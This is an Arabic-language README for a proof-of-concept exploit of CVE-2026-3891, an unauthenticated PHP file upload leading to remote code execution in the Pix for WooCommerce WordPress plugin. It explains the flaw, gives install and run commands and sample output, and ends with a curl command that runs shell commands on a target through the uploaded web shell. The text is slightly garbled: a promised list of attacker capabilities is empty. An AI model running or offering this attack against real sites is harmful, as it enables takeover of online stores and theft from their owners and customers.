
PoC لـ CVE-2026-3891 — رفع ملفات تعسفي غير مصادق عليه يؤدي إلى تنفيذ تعليمات برمجية عن بُعد في Pix for WooCommerce <= 1.5.0
CVE-2026-3891 هو ثغرة خطيرة من نوع رفع ملفات تعسفي بدون مصادقة (Unauthenticated Arbitrary File Upload) تم اكتشافها في إضافة Pix for WooCommerce لووردبريس في الإصدارات حتى 1.5.0 وما يشملها.
توجد الثغرة في وظيفة lkn_pix_for_woocommerce_c6_save_settings بسبب غياب ضوابط التفويض وعدم كفاية التحقق من نوع الملف. تعمل الأداة على أتمتة عملية الحصول على nonce صالح وإثبات إمكانية رفع ملف PHP دون قيود إلى دليل يمكن الوصول إليه عبر الويب.
من خلال استغلال هذه الثغرة، قد يتمكن المهاجم غير المصادق من:
pip install requests
CVE-2026-3891.py على نظامك.python CVE-2026-3891.py
أدخل رابط ووردبريس الهدف عند الطلب:
[?] Enter target URL: http://localhost/wordpress
مثال:
[*] Requesting nonce...
[+] Nonce obtained: **********
[*] Uploading woocommerce.php...
[+] File uploaded successfully!
[+] URL: http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php
curl http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php?cmd=ls
